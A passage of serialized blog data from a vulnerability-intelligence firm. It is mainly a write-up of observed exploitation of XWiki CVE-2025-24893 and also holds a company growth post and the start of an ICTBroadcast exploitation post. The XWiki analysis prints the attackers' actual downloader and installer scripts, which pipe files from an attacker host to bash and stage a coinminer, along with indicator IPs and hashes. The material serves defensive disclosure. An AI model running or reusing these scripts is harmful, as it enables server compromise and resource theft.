Runtime input validation vulnerability leading to persistent DoS discovered by Eyodav (Mike G.A.)",[18,31514,31515,10515,31518,31522],{},[295,31516,31517],{},"Have a vulnerability you’re looking to disclose?",[47,31519,31521],{"href":2999,"rel":31520},[51],"Report it to VulnCheck"," and we’ll handle disclosure coordination and CVE assignment on your behalf!",[61,31524,202],{"id":201},[18,31526,31527,31528,1246,31533,1255,31536,59],{},"The VulnCheck research team is always on the lookout for 
new attack vectors and fresh vulnerability intelligence. For more research like this, see ",[47,31529,31532],{"href":31530,"rel":31531},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fstate-of-exploitation-1h-2025",[51],"State of Exploitation: A Look Into 1H 2025 Vulnerability Exploitation and Threat Activity",[47,31534,30353],{"href":30351,"rel":31535},[51],[47,31537,31540],{"href":31538,"rel":31539},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fstillup-stillevil",[51],"Still Up, Still Evil: A Look at Attacker Infrastructure Longevity",[18,31542,1228,31543,1234,31546,1240,31549,1246,31552,1255,31555,1260],{},[47,31544,1233],{"href":10806,"rel":31545},[51],[47,31547,1239],{"href":1237,"rel":31548},[51],[47,31550,1245],{"href":1243,"rel":31551},[51],[47,31553,1251],{"href":1249,"rel":31554},[51],[47,31556,216],{"href":1258,"rel":31557},[51],{"title":219,"searchDepth":220,"depth":220,"links":31559},[31560,31561,31564,31565],{"id":31247,"depth":220,"text":31248},{"id":31320,"depth":220,"text":31321,"children":31562},[31563],{"id":31364,"depth":1266,"text":31365},{"id":31452,"depth":220,"text":31453},{"id":201,"depth":220,"text":202},"2025-11-05","Insights on emerging threats, VulnCheck-observed exploitation in the wild, and published CVEs from VulnCheck’s research 
teams",{"slug":31569},"november-2025-research-highlights","\u002Fblog\u002Fnovember-2025-research-highlights",{"title":29960,"description":31567},"blog\u002Fnovember-2025-research-highlights",[242,1281,1279,1280],"gQT2on65KKCIRw9CkFWniy5L4O-qY5OB9piPUK3PJEc",{"id":31576,"title":19428,"articles":31577,"authors":31618,"body":31620,"date":31581,"description":32046,"extension":234,"image":7,"link":7,"meta":32047,"navigation":237,"path":32049,"seo":32050,"series":7,"stem":32051,"subtype":7,"tags":32052,"__hash__":32053},"blog\u002Fblog\u002Fxwiki-cve-2025-24893-eitw.md",[31578,31582,31585,31589,31592,31595,31598,31601,31604,31608,31612,31615],{"title":31579,"source":14386,"link":31580,"date":31581},"XWiki RCE Vulnerability Actively Exploted In Wild To Deliver Coinminer","https:\u002F\u002Fcybersecuritynews.com\u002Fxwiki-rce-vulnerability\u002F#google_vignette","2025-10-28",{"title":31583,"source":12157,"link":31584,"date":31581},"Risky Bulletin: HackingTeam successor linked to recent Chrome zero-days","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-hackingteam-successor-linked-to-recent-chrome-zero-days\u002F",{"title":31586,"source":14382,"link":31587,"date":31588},"Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack","https:\u002F\u002Fthehackernews.com\u002F2025\u002F10\u002Factive-exploits-hit-dassault-and-xwiki.html","2025-10-29",{"title":31590,"source":25677,"link":31591,"date":31588},"Attackers Exploit XWiki RCE Vulnerability to Deploy Cryptocurrency Miners","https:\u002F\u002Fcyberpress.org\u002Fxwiki-rce-vulnerability\u002F",{"title":31593,"source":14378,"link":31594,"date":31588},"XWiki Vulnerability Exploited in Cryptocurrency Mining Operation","https:\u002F\u002Fwww.securityweek.com\u002Fxwiki-vulnerability-exploited-in-cryptocurrency-mining-operation\u002F",{"title":31596,"source":12145,"link":31597,"date":31588},"Hackers Hijack Corporate XWiki Servers for Crypto 
Mining","https:\u002F\u002Fhackread.com\u002Fhackers-hijack-xwiki-servers-crypto-mining\u002F",{"title":31599,"source":14407,"link":31600,"date":31588},"XWiki Remote Code Execution Flaw Actively Weaponized for Coinmining","https:\u002F\u002Fgbhackers.com\u002Fxwiki-remote-code-execution-flaw\u002F#google_vignette",{"title":31602,"source":12153,"link":31603,"date":31588},"Dassault Apriso flaws added to CISA list of exploited vulnerabilities","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fdassault-apriso-flaws-added-to-cisa-list-of-exploited-vulnerabilities",{"title":31605,"source":12153,"link":31606,"date":31607},"Cryptomining operation underpinned by critical XWiki exploit","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcryptomining-operation-underpinned-by-critical-xwiki-exploit","2025-10-30",{"title":31609,"source":14382,"link":31610,"date":31611},"CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks","https:\u002F\u002Fthehackernews.com\u002F2025\u002F10\u002Fcisa-flags-vmware-zero-day-exploited-by.html?m=1","2025-10-31",{"title":31613,"source":12153,"link":31614,"date":31611},"XWiki and VMware flaws to CISA list of exploited vulnerabilities","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fxwiki-and-vmware-flaws-to-cisa-list-of-exploited-vulnerabilities",{"title":31616,"source":14378,"link":31617,"date":31611},"CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog","https:\u002F\u002Fwww.securityweek.com\u002Fcisa-adds-exploited-xwiki-vmware-flaws-to-kev-catalog\u002F",[31619],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":31621,"toc":32038},[31622,31625,31670,31673,31687,31691,31695,31698,31702,31706,31725,31731,31738,31780,31783,31787,31791,31794,31798,31802,31825,31831,31897,31909,31913,31917,31931,31943,31948,31950,31953,31957,31964,31966,31998,32000,32003,32005,32018,32035],[263,31623],{":list":31624,"ico":266,"title":20},"[\"XWiki CVE-2025-24893 is under active exploitation, with VulnCheck 
Canaries capturing a two-stage attack chain that delivers a coinminer through the template-injection vulnerability.\",\"CISA KEV does not currently list this vulnerability, underscoring that real-world exploitation often precedes official recognition.\",\"VulnCheck Canaries confirm the exploitation chain and infrastructure, providing concrete indicators defenders can use to identify related activity.\"]",[18,31626,31627,31630,31631,31636,31637,31639,31640,31644,31645,1246,31650,1255,31655,31660,31661,31664,31665,31669],{},[47,31628,30050],{"href":30048,"rel":31629},[51]," is an unauthenticated, remote template-injection vulnerability in ",[47,31632,31635],{"href":31633,"rel":31634},"https:\u002F\u002Fwww.xwiki.org\u002Fxwiki\u002Fbin\u002Fview\u002FMain\u002FWebHome",[51],"XWiki"," that is being actively exploited in the wild. It does ",[295,31638,6881],{}," appear in ",[47,31641,31643],{"href":2864,"rel":31642},[51],"CISA KEV",". Public reporting from ",[47,31646,31649],{"href":31647,"rel":31648},"https:\u002F\u002Fcyble.com\u002Fblog\u002Fcyble-sensors-detect-exploit-attempts-on-ivanti-avtech-ip-cameras\u002F",[51],"Cyble",[47,31651,31654],{"href":31652,"rel":31653},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmap\u002F?day=2025-10-26&host_type=src&vulnerability=cve-2025-24893",[51],"Shadow Server",[47,31656,31659],{"href":31657,"rel":31658},"https:\u002F\u002Fapp.crowdsec.net\u002Fcti\u002Fcve-explorer\u002FCVE-2025-24893",[51],"CrowdSec"," prompted us to add the vulnerability to ",[47,31662,1233],{"href":10806,"rel":31663},[51]," in March 2025, but those reports only indicate exploit attempts. Our ",[47,31666,31668],{"href":920,"rel":31667},[51],"VulnCheck Canaries"," observed a two-stage exploit chain and associated indicators. Below are the technical details.",[18,31671,31672],{},"We observed multiple exploit attempts against our XWiki canaries coming from an attacker geolocated in Vietnam. 
The exploitation proceeds in a two-pass workflow separated by at least 20 minutes: the first pass stages a downloader (writes a file to disk), and the second pass later executes it.",[18,31674,31675,31676,31679,31680,31682,31683,31686],{},"The first request looks like this (the ",[886,31677,31678],{},"text="," parameter is URL-encoded; decoded, it executes a ",[886,31681,1553],{}," that saves a file to ",[886,31684,31685],{},"\u002Ftmp\u002F11909","):",[68,31688],{"src":31689,"alt":21258,"className":31690},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F1-light.png",[10876,21260],[68,31692],{"src":31693,"alt":21258,"className":31694},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F1-dark.png",[21265,21266],[18,31696,31697],{},"Decoded (for clarity):",[68,31699],{"src":31700,"alt":21292,"className":31701},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F2-light.png",[10876,21260],[68,31703],{"src":31704,"alt":21292,"className":31705},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F2-dark.png",[21265,21266],[18,31707,31708,31709,31711,31712,31715,31716,31718,31719,31724],{},"The payload uses ",[886,31710,1553],{}," to fetch a downloader from ",[886,31713,31714],{},"193.32.208.24:8080"," and write it to ",[886,31717,31685],{},". 
That host is serving files via an instance of ",[47,31720,31723],{"href":31721,"rel":31722},"https:\u002F\u002Fgithub.com\u002Fdutchcoders\u002Ftransfer.sh",[51],"transfer.sh"," on port 8080, which hosts not only this secondary payload but additional stages as well.",[18,31726,31727],{},[68,31728],{"alt":31729,"src":31730},"Attacker Hosting on FOFA","\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002Fattacker-hosting.png",[18,31732,31733,31734,31737],{},"The downloaded file, ",[886,31735,31736],{},"x640",", is a small downloader that immediately pulls and pipes two follow-on scripts to bash.",[1354,31739,31742],{"className":31740,"code":31741,"language":2186,"meta":219,"style":219},"language-sh shiki shiki-themes material-theme-lighter github-light github-dark monokai","#!\u002Fbin\u002Fbash\n\nwget -qO- http:\u002F\u002F193.32.208.24:8080\u002F5UipND4m3B\u002Fx521 | bash\nwget -qO- http:\u002F\u002F193.32.208.24:8080\u002FrAWQVR4aQk\u002Fx522 | bash\n",[886,31743,31744,31749,31753,31767],{"__ignoreMap":219},[1373,31745,31746],{"class":1375,"line":1376},[1373,31747,31748],{"class":4630},"#!\u002Fbin\u002Fbash\n",[1373,31750,31751],{"class":1375,"line":220},[1373,31752,6520],{"emptyLinePlaceholder":237},[1373,31754,31755,31757,31759,31762,31764],{"class":1375,"line":1266},[1373,31756,1553],{"class":2206},[1373,31758,2213],{"class":2209},[1373,31760,31761],{"class":1391}," http:\u002F\u002F193.32.208.24:8080\u002F5UipND4m3B\u002Fx521",[1373,31763,2233],{"class":1397},[1373,31765,31766],{"class":2206}," bash\n",[1373,31768,31769,31771,31773,31776,31778],{"class":1375,"line":1852},[1373,31770,1553],{"class":2206},[1373,31772,2213],{"class":2209},[1373,31774,31775],{"class":1391}," http:\u002F\u002F193.32.208.24:8080\u002FrAWQVR4aQk\u002Fx522",[1373,31777,2233],{"class":1397},[1373,31779,31766],{"class":2206},[18,31781,31782],{},"This downloader is staged by the first exploit and only executed after the attacker’s second pass. 
The second request for execution looks like this:",[68,31784],{"src":31785,"alt":21314,"className":31786},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F3-light.png",[10876,21260],[68,31788],{"src":31789,"alt":21314,"className":31790},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F3-dark.png",[21265,21266],[18,31792,31793],{},"Decoded for readability, the payload invokes:",[68,31795],{"src":31796,"alt":21330,"className":31797},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F4-light.png",[10876,21260],[68,31799],{"src":31800,"alt":21330,"className":31801},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F4-dark.png",[21265,21266],[18,31803,31804,31805,31807,31808,982,31811,31814,31815,31817,31818,31821,31822,31824],{},"When executed, ",[886,31806,31685],{}," downloads and runs ",[886,31809,31810],{},"x521",[886,31812,31813],{},"x522",", where ",[886,31816,31810],{}," fetches and installs a coinminer (",[886,31819,31820],{},"tcrond",") and ",[886,31823,31813],{}," starts the miner and attempts to kill competing miners.",[18,31826,31827,31828,31830],{},"Below ",[886,31829,31810],{}," fetches and installs the coinminer binary:",[1354,31832,31834],{"className":2195,"code":31833,"language":2197,"meta":219,"style":219},"#!\u002Fbin\u002Fbash\n\nrm -rf \u002Fvar\u002Ftmp\u002F...\u002F\nmkdir \u002Fvar\u002Ftmp\u002F...\nmkdir \u002Fvar\u002Ftmp\u002F...\u002F...\ncd \u002Fvar\u002Ftmp\u002F...\u002F...\nwget -q http:\u002F\u002F193.32.208.24:8080\u002FrDuiQRKhs5\u002Ftcrond\nchmod +x tcrond\n",[886,31835,31836,31840,31844,31855,31863,31870,31876,31886],{"__ignoreMap":219},[1373,31837,31838],{"class":1375,"line":1376},[1373,31839,31748],{"class":4630},[1373,31841,31842],{"class":1375,"line":220},[1373,31843,6520],{"emptyLinePlaceholder":237},[1373,31845,31846,31849,31852],{"class":1375,"line":1266},[1373,31847,31848],{"class":2206},"rm",[1373,31850,31851],{"class":2209}," -rf",[1373,31853,31854],{"class":1391}," 
\u002Fvar\u002Ftmp\u002F...\u002F\n",[1373,31856,31857,31860],{"class":1375,"line":1852},[1373,31858,31859],{"class":2206},"mkdir",[1373,31861,31862],{"class":1391}," \u002Fvar\u002Ftmp\u002F...\n",[1373,31864,31865,31867],{"class":1375,"line":4692},[1373,31866,31859],{"class":2206},[1373,31868,31869],{"class":1391}," \u002Fvar\u002Ftmp\u002F...\u002F...\n",[1373,31871,31872,31874],{"class":1375,"line":4724},[1373,31873,21460],{"class":1379},[1373,31875,31869],{"class":1391},[1373,31877,31878,31880,31883],{"class":1375,"line":4756},[1373,31879,1553],{"class":2206},[1373,31881,31882],{"class":2209}," -q",[1373,31884,31885],{"class":1391}," http:\u002F\u002F193.32.208.24:8080\u002FrDuiQRKhs5\u002Ftcrond\n",[1373,31887,31888,31891,31894],{"class":1375,"line":4768},[1373,31889,31890],{"class":2206},"chmod",[1373,31892,31893],{"class":1391}," +x",[1373,31895,31896],{"class":1391}," tcrond\n",[18,31898,31899,31901,31902,31904,31905,31908],{},[886,31900,31813],{}," then prepares the environment, kills competing miners, and launches the miner (",[886,31903,31820],{},") with a ",[886,31906,31907],{},"c3pool.org"," configuration:",[68,31910],{"src":31911,"alt":21345,"className":31912},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F5-light.png",[10876,21260],[68,31914],{"src":31915,"alt":21345,"className":31916},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002F5-dark.png",[21265,21266],[18,31918,31919,10515,31923,31928,31929,59],{},[47,31920,31820],{"href":31921,"rel":31922},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fe00e9f9d8d3ea668fbc88ed25a9eefb5b9d8d86a993ff78482500e99ae64351e\u002Fcommunity",[51],[47,31924,31927],{"href":31925,"rel":31926},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F164105513f7b83e60a79e8b6a23c2a6cdaae7b0f7a105d8820c9dbf67ada5c1c",[51],"UPX-packed",". 
The miner, apparently part of a low-end operation, is configured to connect to ",[886,31930,31907],{},[18,31932,31933,31934,31937,31938,31942],{},"All attack traffic originates from ",[886,31935,31936],{},"123.25.249.88",", an IP that geolocates to Vietnam and appears in several recent AbuseIPDB reports. Below is a screenshot from ",[47,31939,24833],{"href":31940,"rel":31941},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F123.25.249.88",[51]," showing the report history for that address.",[18,31944,31945],{},[68,31946],{"alt":24833,"src":31947},"\u002Fblog\u002Fxwiki-cve-2025-24893-eitw\u002Fabuseipdb.png",[61,31949,24910],{"id":24909},[18,31951,31952],{},"The following indicators summarize the infrastructure, files, and hashes associated with this activity.",[993,31954,31956],{"id":31955},"observed-ip-addresses","Observed IP Addresses",[22,31958,31959,31961],{},[25,31960,31936],{},[25,31962,31963],{},"193.32.208.24",[993,31965,14665],{"id":14662},[22,31967,31968,31974,31980,31986,31992],{},[25,31969,31970,31971],{},"tcrond (UPX packed): ",[886,31972,31973],{},"0b907eee9a85d39f8f0d7c503cc1f84a71c4de10",[25,31975,31976,31977],{},"tcrond (unpacked): ",[886,31978,31979],{},"90d274c7600fbdca5fe035250d0baff20889ec2b",[25,31981,31982,31983],{},"x521: ",[886,31984,31985],{},"de082aeb01d41dd81cfb79bc5bfa33453b0022ed",[25,31987,31988,31989],{},"x522: ",[886,31990,31991],{},"2abd6f68a24b0a5df5809276016e6b85c77e5f7f",[25,31993,31994,31995],{},"x640: ",[886,31996,31997],{},"5abc337dbc04fee7206956dad1e0b6d43921a868",[61,31999,1903],{"id":1902},[18,32001,32002],{},"VulnCheck and others have tracked this vulnerability being exploited in the wild for much of 2025. Its absence from CISA KEV highlights that the catalog does not capture all real-world exploitation. 
By integrating third-party evidence of exploitation from sources like Cyble and Shadow Server, VulnCheck KEV identifies emerging threats sooner, while VulnCheck Canaries provide the direct observations needed to validate and now report active exploitation even faster.",[61,32004,202],{"id":201},[18,32006,29952,32007,1246,32010,1255,32013,59],{},[47,32008,30353],{"href":30351,"rel":32009},[51],[47,32011,30358],{"href":30356,"rel":32012},[51],[47,32014,32017],{"href":32015,"rel":32016},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fgit-parameter-rce",[51],"Command Injection in Jenkins via Git Parameter (CVE-2025-53652)",[18,32019,1228,32020,1234,32023,1240,32026,1246,32029,1255,32032,1260],{},[47,32021,1233],{"href":10806,"rel":32022},[51],[47,32024,1239],{"href":1237,"rel":32025},[51],[47,32027,1245],{"href":1243,"rel":32028},[51],[47,32030,1251],{"href":1249,"rel":32031},[51],[47,32033,216],{"href":1258,"rel":32034},[51],[2901,32036,32037],{},"html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: 
var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sMLJd, html code.shiki 
.sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}",{"title":219,"searchDepth":220,"depth":220,"links":32039},[32040,32044,32045],{"id":24909,"depth":220,"text":24910,"children":32041},[32042,32043],{"id":31955,"depth":1266,"text":31956},{"id":14662,"depth":1266,"text":14665},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck Canaries captured live exploitation of XWiki CVE-2025-24893, a vulnerability absent from CISA KEV but actively abused in the wild.",{"slug":32048},"xwiki-cve-2025-24893-eitw","\u002Fblog\u002Fxwiki-cve-2025-24893-eitw",{"title":19428,"description":32046},"blog\u002Fxwiki-cve-2025-24893-eitw",[2941,242,1281,1279],"Nvd5cPgg0UBZOzrlsksdenILgs6uzBKW_KkFnFUY_Uo",{"id":32055,"title":32056,"articles":32057,"authors":32058,"body":32064,"date":32186,"description":32068,"extension":234,"image":7,"link":7,"meta":32187,"navigation":237,"path":32188,"seo":32189,"series":7,"stem":32190,"subtype":7,"tags":32191,"__hash__":32192},"blog\u002Fblog\u002Fq3-2025-momentum.md","Accelerating Our Footprint and Innovation: Why VulnCheck Posted a Record-Setting Q3",[],[32059],{"name":32060,"avatar":32061,"link":32062,"linkName":32063},"Tom Bain","\u002Fteam\u002Fthomas-bain.jpg","https:\u002F\u002Fx.com\u002Ftmbainjr1","@tmbainjr1",{"type":15,"value":32065,"toc":32179},[32066,32069,32077,32080,32086,32089,32092,32095,32101,32104,32110,32119,32125,32128,32135,32155,32161,32164,32170,32173,32176],[18,32067,32068],{},"This quarter was a defining one for VulnCheck — not just in numbers, but in what those numbers represent and how critical VulnCheck is in both enriching cyber products in the market and protecting our global economy and national security.",[18,32070,32071,32076],{},[47,32072,32075],{"href":32073,"rel":32074},"https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-momentum-2025",[51],"Crossing the $10 million in ARR"," and posting our first $2M+ quarter marks a historic 
milestone for us. But it’s also a signal that the cybersecurity market is waking up to the reality that exploit intelligence is the missing layer in vulnerability management — and that our approach is fundamentally reshaping how teams think about defending emerging threats at scale.",[18,32078,32079],{},"This is on top of VulnCheck’s triple-digit growth in 2024 where we tripled ARR year-over-year, grew our customer base 152%, and achieved 100% gross retention. That tells me something simple yet powerful: our customers are not just staying with us — they’re expanding with us. And we’re staffing up to support customers at scale, growing global headcount by 126% YTD.",[61,32081,32083],{"id":32082},"a-shift-in-the-threat-landscape",[295,32084,32085],{},"A Shift in the Threat Landscape",[18,32087,32088],{},"The urgency behind this growth is real.",[18,32090,32091],{},"In the past year alone, vulnerabilities exploited on or before disclosure have caused a 180% spike in breaches making exploitation now the leading cause of major cyber incidents - - more than phishing. And the window from “public disclosure” to “in-the-wild” activity is shrinking from weeks to hours.",[18,32093,32094],{},"Security teams don’t need more alerts or some single pane  — they need faster, smarter data with context. That’s where VulnCheck is leading the charge: providing real-time, autonomously pulled intelligence that combines vulnerability, exploit, and threat data into a single, actionable signal.",[61,32096,32098],{"id":32097},"growing-the-leadership-bench",[295,32099,32100],{},"Growing the Leadership Bench",[18,32102,32103],{},"We also welcomed two powerhouse additions to the company this quarter.",[18,32105,32106,32109],{},[47,32107,256],{"href":258,"rel":32108},[51],", our new Vice President of Security Research, brings deep experience in vulnerability analysis and threat research. 
She’s already expanding our research programs and publishing findings that help the entire industry understand exploitation at scale.",[18,32111,32112,32113,32118],{},"VulnCheck also added ",[47,32114,32117],{"href":32115,"rel":32116},"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fpatrickmorley\u002F",[51],"Patrick Morley",", former CEO of Carbon Black, to our Board of Directors. Patrick’s track record in scaling one of cybersecurity’s most successful companies is invaluable as we continue to expand our global presence across enterprise and federal markets.",[993,32120,32122],{"id":32121},"community-customers-and-category-leadership",[295,32123,32124],{},"Community, Customers, and Category Leadership",[18,32126,32127],{},"From the start, VulnCheck has been focused on community and transparency.",[18,32129,10402,32130,32134],{},[47,32131,28667],{"href":32132,"rel":32133},"https:\u002F\u002Fwww.vulncheck.com\u002Fcommunity",[51]," now has over 12,000 registered users — researchers, defenders, and vendors who rely on VulnCheck KEV, NVD++, and XDB to stay ahead of exploitation.",[18,32136,32137,32138,32143,32144,32149,32150,59],{},"We also launched the ",[47,32139,32142],{"href":32140,"rel":32141},"https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-announces-partner-program",[51],"VulnCheck Partner Program"," on a global scale, hosted our first ",[47,32145,32148],{"href":32146,"rel":32147},"https:\u002F\u002Fwww.threatcon1.org",[51],"THREATCON1"," conference (which drew more than 300 attendees), and were recognized by SINET16 as one of ",[47,32151,32154],{"href":32152,"rel":32153},"https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator",[51],"the most innovative cybersecurity companies of 2025",[18,32156,32157,32158,59],{},"Behind the metrics, though, is something more meaningful: ",[295,32159,32160],{},"trust",[18,32162,32163],{},"We’ve earned it from our customers by delivering intelligence that arrives 
hours, days, and sometimes even years before traditional sources. And we’ve earned it from the community by maintaining a transparent, open-source-aligned approach to vulnerability data.",[61,32165,32167],{"id":32166},"looking-ahead",[295,32168,32169],{},"Looking Ahead",[18,32171,32172],{},"Momentum like this doesn’t happen by accident. It comes from relentless focus — on solving a real problem, building a culture of technical excellence, and staying close to the customers who are counting on us.",[18,32174,32175],{},"We’ve ascended from 115th in CVE assignment ranking to 56th out of 518 CNAs from Q2 to Q3 this year which demonstrates our commitment to vulnerability research in the broader cyber market.",[18,32177,32178],{},"As we look toward 2026, we’re not just growing a company. We’re building a foundation for how the world understands and responds to exploited vulnerabilities better, faster and with more emerging threat context. Because when every hour counts, intelligence has to move at the speed of business to outpace adversaries.",{"title":219,"searchDepth":220,"depth":220,"links":32180},[32181,32182,32185],{"id":32082,"depth":220,"text":32085},{"id":32097,"depth":220,"text":32100,"children":32183},[32184],{"id":32121,"depth":1266,"text":32124},{"id":32166,"depth":220,"text":32169},"2025-10-16",{},"\u002Fblog\u002Fq3-2025-momentum",{"title":32056,"description":32068},"blog\u002Fq3-2025-momentum",[],"N9Vwm5xStkaSl_yp8rBU03ieZg1PcY4Tq_Nb8Zkwa8U",{"id":32194,"title":24026,"articles":32195,"authors":32237,"body":32239,"date":32465,"description":32466,"extension":234,"image":7,"link":7,"meta":32467,"navigation":237,"path":32469,"seo":32470,"series":7,"stem":32471,"subtype":7,"tags":32472,"__hash__":32473},"blog\u002Fblog\u002Fictbroadcast-kev.md",[32196,32200,32203,32206,32209,32212,32215,32218,32221,32224,32227,32230,32233],{"title":32197,"source":14382,"link":32198,"date":32199},"Hackers Target ICTBroadcast Servers via Cookie Exploit to Gain Remote Shell 
Access","https:\u002F\u002Fthehackernews.com\u002F2025\u002F10\u002Fhackers-target-ictbroadcast-servers-via.html","2025-10-15",{"title":32201,"source":3495,"link":32202,"date":32199},"Risky Bulletin: Windows 10 reaches End-of-Life","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-windows-10-reaches-end-of-life\u002F",{"title":32204,"source":19479,"link":32205,"date":32186},"Breach Roundup: Chinese Hackers Exploited ArcGIS","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32207,"link":32208,"date":32186},"DeviceSecurity","https:\u002F\u002Fwww.devicesecurity.io\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32210,"link":32211,"date":32186},"CareersInfoSecurity","https:\u002F\u002Fwww.careersinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32213,"link":32214,"date":32186},"CUInfoSecurity","https:\u002F\u002Fwww.cuinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32216,"link":32217,"date":32186},"DataBreachToday","https:\u002F\u002Fwww.databreachtoday.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32219,"link":32220,"date":32186},"Fraudtoday.io","https:\u002F\u002Fwww.fraudtoday.io\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32222,"link":32223,"date":32186},"GovInfoSecurity","https:\u002F\u002Fwww.govinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32225,"link":32226,"date":32186},"HealthCareInfoSecurity","https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749",{"title":32204,"source":32228,"link":32229,"date":32186},"InfoRiskToday","https:\u002F\u002Fw
ww.inforisktoday.com\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32204,"source":32231,"link":32232,"date":32186},"PaymentSecurity.io","https:\u002F\u002Fwww.paymentsecurity.io\u002Fbreach-roundup-chinese-hackers-exploited-arcgis-a-29749?highlight=true",{"title":32234,"source":14378,"link":32235,"date":32236},"In Other News: CrowdStrike Vulnerabilities, CISA Layoffs, Mango Data Breach","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-crowdstrike-vulnerabilities-cisa-layoffs-mango-data-breach\u002F","2025-10-17",[32238],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":32240,"toc":32456},[32241,32244,32250,32252,32270,32287,32291,32298,32304,32318,32326,32332,32339,32345,32352,32358,32385,32389,32400,32404,32415,32419,32426,32428,32439],[263,32242],{":list":32243,"ico":266,"title":20},"[\"VulnCheck observed that CVE-2025-2611 is being actively exploited. Attackers are leveraging the unauthenticated command injection in ICTBroadcast via the `BROADCAST` cookie to gain remote code execution. Approximately 200 online instances are exposed.\",\"Indicators overlap with prior activity 